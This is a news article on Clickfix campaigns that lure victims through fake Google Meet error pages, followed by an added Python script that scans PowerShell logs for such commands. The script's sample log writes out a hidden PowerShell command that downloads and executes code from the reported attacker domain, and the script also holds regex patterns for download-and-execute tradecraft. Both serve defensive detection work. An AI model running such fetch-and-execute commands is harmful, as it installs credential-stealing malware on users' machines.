In a new wave of Clickfix campaigns, scammers are luring users to fake Google Meet pages that display bogus error messages, tricking them into running a command that installs malware capable of infecting both Windows and macOS systems.
The Clickfix tactic first came to light in May, when cybersecurity company Proofpoint reported its use by the TA571 group. The initial attacks displayed fake error messages in Google Chrome, Microsoft Word and OneDrive that instructed victims to paste a supplied command into PowerShell to "fix" the problem; running it infected the device.
Malware such as DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig and Lumma Stealer has been distributed this way. In July, McAfee reported a rise in the frequency of these attacks, particularly in the USA and Japan.
Recent reports show a shift in Clickfix tactics: attackers now use fake Google Meet invitations and phishing emails aimed at transport and logistics companies, as well as fake Facebook pages and GitHub discussions, to lure victims.
Sekoia has linked these recent campaigns to two groups – Slavic Nation Empire (SNE) and Scamquerteo, allegedly affiliated with cryptocurrency fraud groups Marko Polo and Cryptolove.
The Google Meet lure is convincing: scammers send emails containing links to look-alike domains that resemble official Google Meet addresses. Visitors to these pages are shown a fake error about their microphone or headset, and attempting to "fix" it triggers the Clickfix script, which has the victim run a PowerShell command that downloads malware from the googiedrivers[.]com domain. No browser exploit is involved; the command runs in the victim's own user context because the victim launches it, which is why endpoint telemetry on PowerShell execution, rather than browser hardening alone, is where this chain is most visible.
Windows victims receive Stealc or Rhadamanthys, while macOS victims are served AMOS Stealer as a .dmg file named "Launcher_V194". Beyond Google Meet, the attackers also use Zoom, fake PDF readers, counterfeit video games and Web3 projects as lures to distribute malware.
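Because the victim executes the PowerShell command themselves, the most reliable place to catch the chain described above is PowerShell script-block logging (Event ID 4104) rather than the browser. The script below is an added example, not code from the article or from any of the vendors it cites: it scores each logged ScriptBlockText value for the typical shape of a Clickfix one-liner (a download cradle, in-memory execution via IEX, console-hiding or policy-bypass flags) and adds weight for the googiedrivers[.]com indicator the article reports. The regex heuristics, the scoring weights, the threshold and the sample log entries (including the URL path and the example.net host) are this example's own assumptions, constructed for illustration.

```python
"""Heuristic scan of PowerShell script-block log entries for Clickfix-style commands (added example)."""
import re
from dataclasses import dataclass, field

# Indicator taken from the article: the domain the Google Meet lure's command downloads from.
KNOWN_BAD_DOMAINS = {"googiedrivers.com"}

# Heuristic regexes for the shape of a Clickfix one-liner. These are this example's
# assumptions about common PowerShell tradecraft, not patterns given in the article.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|"
    r"curl|wget|start-bitstransfer)\b"
)
IN_MEMORY_EXEC = re.compile(r"(?i)(\biex\b|invoke-expression)")
STEALTH_FLAGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass|-enc(odedcommand)?\b)"
)
URL_HOST = re.compile(r"(?i)https?://([a-z0-9.-]+)")


@dataclass
class Finding:
    index: int                      # position of the entry in the scanned log
    score: int
    reasons: list = field(default_factory=list)


def score_command(cmd: str):
    """Return (score, reasons) for one ScriptBlockText value."""
    score, reasons = 0, []
    if DOWNLOAD_CRADLE.search(cmd):
        score += 2
        reasons.append("download cradle")
    if IN_MEMORY_EXEC.search(cmd):
        score += 2
        reasons.append("in-memory execution (IEX)")
    if STEALTH_FLAGS.search(cmd):
        score += 1
        reasons.append("console-hiding / policy-bypass flags")
    for m in URL_HOST.finditer(cmd):
        host = m.group(1).lower().rstrip(".")
        if host in KNOWN_BAD_DOMAINS:
            score += 5
            reasons.append(f"known Clickfix domain {host}")
    return score, reasons


def scan_script_block_log(entries, threshold: int = 4):
    """Scan a sequence of ScriptBlockText strings (e.g. extracted from Event ID 4104)
    and return the entries at or above the threshold, highest score first."""
    findings = [Finding(i, *score_command(text)) for i, text in enumerate(entries)]
    hits = [f for f in findings if f.score >= threshold]
    return sorted(hits, key=lambda f: -f.score)


# Constructed sample log: four ScriptBlockText values, not real telemetry.
SAMPLE_LOG = [
    # benign admin activity
    r"Get-ChildItem C:\Users\alice\Documents -Recurse",
    # Clickfix-style one-liner as a victim would paste it; the URL path is made up
    "powershell -w hidden -nop -c \"iex (iwr 'https://googiedrivers.com/').Content\"",
    # legitimate download to disk: a cradle on its own stays below the threshold
    "Invoke-WebRequest -Uri https://www.microsoft.com/ -OutFile page.html",
    # same cradle-plus-IEX behaviour against a host not on the IOC list (hypothetical)
    "iex (irm https://example.net/)",
]

if __name__ == "__main__":
    for hit in scan_script_block_log(SAMPLE_LOG):
        print(f"entry {hit.index}: score {hit.score}: {', '.join(hit.reasons)}")
```

The fourth sample entry is flagged on behaviour alone, with no known domain involved; that is the point of scoring the command shape rather than matching only indicators, since the download domain in these campaigns changes far more often than the cradle-plus-IEX pattern does. Raise the threshold to 5 in an environment where administrators routinely use IEX and only the IOC-backed hits will remain.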